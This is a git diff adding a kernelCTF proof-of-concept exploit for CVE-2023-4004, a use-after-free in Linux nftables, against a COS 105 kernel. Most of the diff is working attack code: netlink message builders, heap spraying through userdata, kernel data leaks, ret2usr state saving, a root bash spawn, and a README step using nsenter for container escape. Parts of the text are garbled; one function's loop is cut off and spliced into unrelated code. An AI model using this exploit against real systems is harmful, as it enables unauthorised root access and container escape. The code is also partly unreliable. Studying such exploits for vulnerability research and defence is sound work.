UAF + diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/Makefile b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/Makefile new file mode 100644 index 00000000..e2a6e2ce --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/Makefile @@ -0,0 +1,9 @@ +exploit: + gcc -o exploit exploit.c -I/usr/include/libnl3 -lnl-nf-3 -lnl-route-3 -lnl-3 -static +prerequisites: + sudo apt-get install libnl-nf-3-dev +run: + ./exploit + +clean: + rm exploit diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/README b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/README new file mode 100644 index 00000000..a47f88fd --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/README @@ -0,0 +1,2 @@ +Exploit for kctf COS 105-17412.101.17 +Run command "nsenter --target 1 -m -p" after run the poc. diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/chain.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/chain.h new file mode 100644 index 00000000..4245eb47 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/chain.h @@ -0,0 +1,56 @@ +void new_chain(struct nl_sock * socket, char *table_name, char *chain_name){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2;//NFPROTO_IPV4; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWCHAIN),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + nla_put_string(msg2, NFTA_CHAIN_TABLE, table_name); + nla_put_string(msg2, NFTA_CHAIN_NAME, chain_name); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + printf("Create chain %s\n",chain_name); + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit new file mode 100755 index 00000000..d02e2a8e Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit.c b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit.c new file mode 100644 index 00000000..77e4cda9 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit.c @@ -0,0 +1,359 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "obj.h" +#include "setelem.h" +#include "table.h" +#include "set.h" +#include "rule.h" +#include "chain.h" +#include "spec.h" +#define THREAD_MAX_NUM 100 +#define SET_TABLE "set-table" +#define OBJ_FOR_REF "obj-for-ref" +#define OBJ_TABLE "obj-table" + +char *leak_obj=NULL; +char *target_table=NULL; +char *leak_data=NULL; +int ct_expect_obj_num = 0; +int table_num = 0; + +unsigned long user_cs,user_ss,user_rsp,user_rflags; +uint64_t kernel_off, module_base, type_addr, prepare_kernel_cred, commit_creds; +uint64_t set_num = 0; +static void save_state() { + asm( + "movq %%cs, %0\n" + "movq %%ss, %1\n" + "movq %%rsp, %2\n" + "pushfq\n" + "popq %3\n" + : "=r" (user_cs), "=r" (user_ss), "=r" (user_rsp),"=r" (user_rflags) : : "memory"); +} + + +void shell(){ + //printf("ret2usr success! uid : %d\n",getuid()); + + char *args[] = {"/bin/bash", "-i", NULL}; + execve(args[0], args, NULL); +} + +int nl_callback_find_target_table(struct nl_msg* recv_msg, void* arg) +{ + + struct nlmsghdr * ret_hdr = nlmsg_hdr(recv_msg); + struct nlattr * tb_msg[NFTA_TABLE_MAX+1]; + memset(tb_msg,0,NFTA_TABLE_MAX * 8); + + if (ret_hdr->nlmsg_type == NLMSG_ERROR) { + //fprintf(stderr, "Received NLMSG_ERROR message!\n"); + return NL_STOP; + } + + struct nlattr *attr = (void *)ret_hdr + nlmsg_total_size(sizeof(struct nfgenmsg)); + int attrlen = ret_hdr->nlmsg_len - nlmsg_total_size(sizeof(struct nfgenmsg)); + nla_parse(tb_msg, NFTA_TABLE_MAX, attr, attrlen, NULL); + char * table_name=NULL; + if (tb_msg[NFTA_TABLE_NAME]) { + table_name = nla_get_string(tb_msg[NFTA_TABLE_NAME]); + //printf("Get table: '%s'\n", table_name ); + } + if (tb_msg[NFTA_TABLE_USERDATA]){ + uint64_t * val = malloc(nla_len(tb_msg[NFTA_TABLE_USERDATA])); + nla_memcpy(val, tb_msg[NFTA_TABLE_USERDATA], nla_len(tb_msg[NFTA_TABLE_USERDATA])); + //printf("data[0] = %lx\n", val[0]); + if((val[0]&0xfffffffffffff000)!= 0x4c00000000000000 && val[0]!=0){ + printf("Get table: '%s'\n", table_name ); + printf("data[0] = %lx\n", val[0]); + leak_obj = (char *)val; + target_table = malloc(strlen(table_name)+1); + strcpy(target_table,table_name); + leak_data = (char *)val; + } + } + return NL_OK; +} + + +int nl_callback_for_obj(struct nl_msg* recv_msg, void* arg) +{ + + struct nlmsghdr * ret_hdr = nlmsg_hdr(recv_msg); + struct nlattr * tb_msg[NFTA_OBJ_MAX+1]; + memset(tb_msg,0,NFTA_OBJ_MAX * 8); + + if (ret_hdr->nlmsg_type == NLMSG_ERROR) { + //fprintf(stderr, "Received NLMSG_ERROR message!\n"); + return NL_STOP; + } + + struct nlattr *attr = (void *)ret_hdr + nlmsg_total_size(sizeof(struct nfgenmsg)); + int attrlen = ret_hdr->nlmsg_len - nlmsg_total_size(sizeof(struct nfgenmsg)); + nla_parse(tb_msg, NFTA_OBJ_MAX, attr, attrlen, NULL); + char * obj_name=NULL; + if (tb_msg[NFTA_OBJ_NAME]) { + obj_name = nla_get_string(tb_msg[NFTA_OBJ_NAME]); + printf("Get obj: '%s'\n", obj_name ); + } + if (tb_msg[NFTA_OBJ_USERDATA]){ + uint64_t * val = malloc(nla_len(tb_msg[NFTA_OBJ_USERDATA])); + nla_memcpy(val, tb_msg[NFTA_OBJ_USERDATA], nla_len(tb_msg[NFTA_OBJ_USERDATA])); + printf("data[0] = %lx\n", val[0]); + leak_data = (char *)val; + } + return NL_OK; +} + +int setup_sandbox(void) { + if (unshare(CLONE_NEWUSER) < 0) { + perror("[-] unshare(CLONE_NEWUSER)"); + return -1; + } + if (unshare(CLONE_NEWNET) < 0) { + perror("[-] unshare(CLONE_NEWNET)"); + return -1; + } + return 0; +} + +void spray_tables(struct nl_sock * socket, int len, char *udata, int size){ + char *tmp = malloc(0x100); + memset(tmp,0,0x100); + int i; + for(i=0;infgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWOBJ),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *data = nlmsg_alloc(); + char *a = malloc(0x100); + memset(a,0x41,0x100); + + nla_put_u8(data, NFTA_CT_EXPECT_L4PROTO, 0x41); + nla_put_u16(data, NFTA_CT_EXPECT_DPORT, 0x4141); + nla_put_u32(data, NFTA_CT_EXPECT_TIMEOUT, 0x41414141); + nla_put_u8(data, NFTA_CT_EXPECT_SIZE, 0x41); + nla_put_nested(msg2, NFTA_OBJ_DATA, data); + nla_put_string(msg2, NFTA_OBJ_NAME, obj_name); + nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(NFT_OBJECT_CT_EXPECT)); + nla_put_string(msg2, NFTA_OBJ_TABLE, table_name); + if(udata>0) + nla_put(msg2, NFTA_OBJ_USERDATA, ulen, udata); + //int res = nl_send_auto(socket, msg); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create object tunnel %s\n",obj_name); + } +} +void new_obj_tunnel(struct nl_sock * socket, char *table_name, char *obj_name, void *udata, uint32_t ulen){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWOBJ),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *data = nlmsg_alloc(); + struct nl_msg *ip = nlmsg_alloc(); + struct nl_msg *opts = nlmsg_alloc(); + struct nl_msg *opts_gen = nlmsg_alloc(); + //init ip + char *a = malloc(0x100); + memset(a,0x41,0x100); + nla_put_u32(ip, NFTA_TUNNEL_KEY_IP_DST, 0x41414141); + + nla_put_u16(opts_gen, NFTA_TUNNEL_KEY_GENEVE_CLASS, 0x10); + nla_put(opts_gen, NFTA_TUNNEL_KEY_GENEVE_DATA, 0x80, a); + nla_put_u8(opts_gen, NFTA_TUNNEL_KEY_GENEVE_TYPE, 0x10); + + nla_put_nested(opts, NFTA_TUNNEL_KEY_OPTS_GENEVE|NLA_F_NESTED, opts_gen); + //struct nlattr *nla = nla_reserve(opts, NFTA_TUNNEL_KEY_OPTS_GENEVE, nlmsg_datalen(opts_gen->nm_nlh)); + //nla->nla_type |= NLA_F_NESTED; + //memcpy(nla_data(nla), nlmsg_data(opts_gen->nm_nlh),nlmsg_datalen(opts_gen->nm_nlh)); + + nla_put_u32(data, NFTA_TUNNEL_KEY_ID, 0x41414141); + nla_put_nested(data, NFTA_TUNNEL_KEY_IP, ip); + nla_put_nested(data, NFTA_TUNNEL_KEY_OPTS, opts); + nla_put_nested(msg2, NFTA_OBJ_DATA, data); + nla_put_string(msg2, NFTA_OBJ_NAME, obj_name); + nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(NFT_OBJECT_TUNNEL)); + nla_put_string(msg2, NFTA_OBJ_TABLE, table_name); + if(udata>0) + nla_put(msg2, NFTA_OBJ_USERDATA, ulen, udata); + //int res = nl_send_auto(socket, msg); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create object tunnel %s\n",obj_name); + } +} + +void new_obj_quota(struct nl_sock * socket, char *table_name, char *obj_name,void *udata, uint32_t ulen){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWOBJ),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *data = nlmsg_alloc(); + //init ip + nla_put_u64(data, NFTA_QUOTA_BYTES, 0x100); + + nla_put_nested(msg2, NFTA_OBJ_DATA, data); + nla_put_string(msg2, NFTA_OBJ_NAME, obj_name); + nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(NFT_OBJECT_QUOTA)); + nla_put_string(msg2, NFTA_OBJ_TABLE, table_name); + if(udata>0) + nla_put(msg2, NFTA_OBJ_USERDATA, ulen, udata); + //int res = nl_send_auto(socket, msg); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create object quota %s\n",obj_name); + } +} + +void get_obj(struct nl_sock * socket, char *table_name, char *obj_name, uint32_t obj_type){ + //init msg + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + nfnlmsg_put( + msg, + NL_AUTO_PID, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_SUBSYS_NFTABLES, //SUBSYS + NFT_MSG_GETOBJ, // TYPE + NLM_F_REQUEST, //NLM_F_ECHO + 2, //FAMILY + 0 //RES_ID + ); + //init msg + nla_put_u32(msg, NFTA_OBJ_TYPE, htonl(obj_type)); + nla_put_string(msg, NFTA_OBJ_NAME, obj_name); + nla_put_string(msg, NFTA_OBJ_TABLE, table_name); + + int res = nl_send_auto(socket, msg); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Get obj %s\n",obj_name); + } +} + +void del_obj(struct nl_sock * socket, char *table_name, char *obj_name, uint32_t obj_type){ + + struct nl_msg * msg = nlmsg_alloc(); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELOBJ),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + + nla_put_string(msg2, NFTA_OBJ_NAME, obj_name); + nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(obj_type)); + nla_put_string(msg2, NFTA_OBJ_TABLE, table_name); + + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Delete object %s\n",obj_name); + } + +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/rule.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/rule.h new file mode 100644 index 00000000..d1fcd292 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/rule.h @@ -0,0 +1,71 @@ +void new_rule(struct nl_sock * socket, char *table_name, char *chain_name){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2;//NFPROTO_IPV4; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWRULE),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nl_msg * exprs = nlmsg_alloc(); + struct nl_msg *data_nest = nlmsg_alloc(); + struct nl_msg *expr_data = nlmsg_alloc(); + + char *a = malloc(0x100); + memset(a,0x41,0x100); + nla_put_string(expr_data, NFTA_MATCH_NAME, "set"); + nla_put_u32(expr_data, NFTA_MATCH_REV, htonl(0)); + nla_put(expr_data, NFTA_MATCH_INFO,0x100,a); + + nla_put_string(data_nest, NFTA_EXPR_NAME, "match"); + nla_put_nested(data_nest, NFTA_EXPR_DATA, expr_data); + + nla_put_nested(exprs, NFTA_LIST_ELEM, data_nest); + nla_put_string(msg2, NFTA_RULE_TABLE, table_name); + nla_put_string(msg2, NFTA_RULE_CHAIN, chain_name); + nla_put_nested(msg2, NFTA_RULE_EXPRESSIONS, exprs); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + printf("Create rule\n"); + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/set.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/set.h new file mode 100644 index 00000000..d053bed8 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/set.h @@ -0,0 +1,77 @@ +void new_set(struct nl_sock * socket, char *table_name, char *set_name, uint32_t obj_type){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWSET),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + struct nl_msg *data = nlmsg_alloc(); + struct nl_msg *data_nest = nlmsg_alloc(); + struct nl_msg *data_nest_nest = nlmsg_alloc(); + //init IPSET_ATTR_DATA + + int i=0; + + nla_put_u32(data_nest_nest, NFTA_SET_FIELD_LEN, htonl(0x10)); + for(i=0;i<2;i++){ + nla_put_nested(data_nest, NFTA_LIST_ELEM, data_nest_nest); + } + + nla_put_nested(data, NFTA_SET_DESC_CONCAT, data_nest); + //create test1 + nla_put_string(msg2, NFTA_SET_TABLE, table_name); + nla_put_string(msg2, NFTA_SET_NAME, set_name); + nla_put_u32(msg2, NFTA_SET_ID, 0x10); + nla_put_nested(msg2, NFTA_SET_DESC, data); + nla_put_u32(msg2, NFTA_SET_KEY_LEN, htonl(0x40)); + nla_put_u32(msg2, NFTA_SET_FLAGS, htonl(NFT_SET_INTERVAL|NFT_SET_OBJECT|NFT_SET_CONCAT)); + nla_put_u32(msg2, NFTA_SET_OBJ_TYPE, htonl(obj_type)); + //int res = nl_send_auto(socket, msg); + 